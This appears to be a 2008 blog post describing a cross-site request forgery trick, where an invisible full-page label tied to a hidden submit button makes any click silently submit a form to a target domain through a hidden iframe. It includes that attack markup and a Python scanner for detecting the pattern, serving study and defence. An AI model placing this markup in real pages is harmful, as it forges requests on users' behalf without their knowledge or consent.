I found this post very interesting for a number of reasons. Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening. After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example. Plenty of nastiness can ensue.
code!
<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
  <p>
    <label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0"> </label>
    <input type="submit" id="submit" style="display:none"/>
  </p>
</form>
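For anyone reviewing pages or user-supplied markup for this pattern, here is an added example (not code from the original post) of a static check that flags a page-covering label wired to a hidden submit button. The function names, the inline-style heuristics and the second sample form are assumptions made for the illustration; styles applied through a stylesheet are not inspected.

```python
from html.parser import HTMLParser

# Constructed samples: the first mirrors the markup shown above, the second is an ordinary form.
SAMPLE_OVERLAY = """<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame"><p>
<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0"> </label>
<input type="submit" id="submit" style="display:none"/></p></form>"""
SAMPLE_BENIGN = '<form action="/search"><label for="q">Search</label><input type="text" id="q"><input type="submit" id="go"></form>'

def parse_style(attrs):
    """Turn an inline style attribute into a {property: value} dict."""
    pairs = (d.split(":", 1) for d in (attrs.get("style") or "").split(";") if ":" in d)
    return {k.strip().lower(): v.strip().lower() for k, v in pairs}

def is_hidden(style):
    return style.get("display") == "none" or style.get("visibility") == "hidden"

def covers_viewport(style):
    edges = ("top", "right", "bottom", "left")
    return style.get("position") in ("fixed", "absolute") and all(style.get(e) in ("0", "0px") for e in edges)

class LabelOverlayScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden_frames, self.hidden_submits, self.overlay_labels = set(), {}, []
        self._form = None  # attributes of the form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = parse_style(a)
        if tag == "iframe" and a.get("name") and is_hidden(style):
            self.hidden_frames.add(a["name"])
        elif tag == "form":
            self._form = a
        elif tag == "input" and (a.get("type") or "").lower() == "submit" and a.get("id") and is_hidden(style):
            self.hidden_submits[a["id"]] = self._form or {}
        elif tag == "label" and a.get("for") and covers_viewport(style):
            self.overlay_labels.append(a["for"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def scan(html):
    """Report forms whose hidden submit button is wired to a page-covering label."""
    p = LabelOverlayScanner()
    p.feed(html)
    p.close()
    return [{"action": p.hidden_submits[t].get("action"),
             "targets_hidden_frame": p.hidden_submits[t].get("target") in p.hidden_frames}
            for t in p.overlay_labels if t in p.hidden_submits]
```
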
October 5th, 2008 at 9:54 am
[...] [3] http://www.0x000000.com/index.php?i=312 [4] http://trickeries.com/216/an-interesting-csrf-attack/ source: OWASP News Share and [...]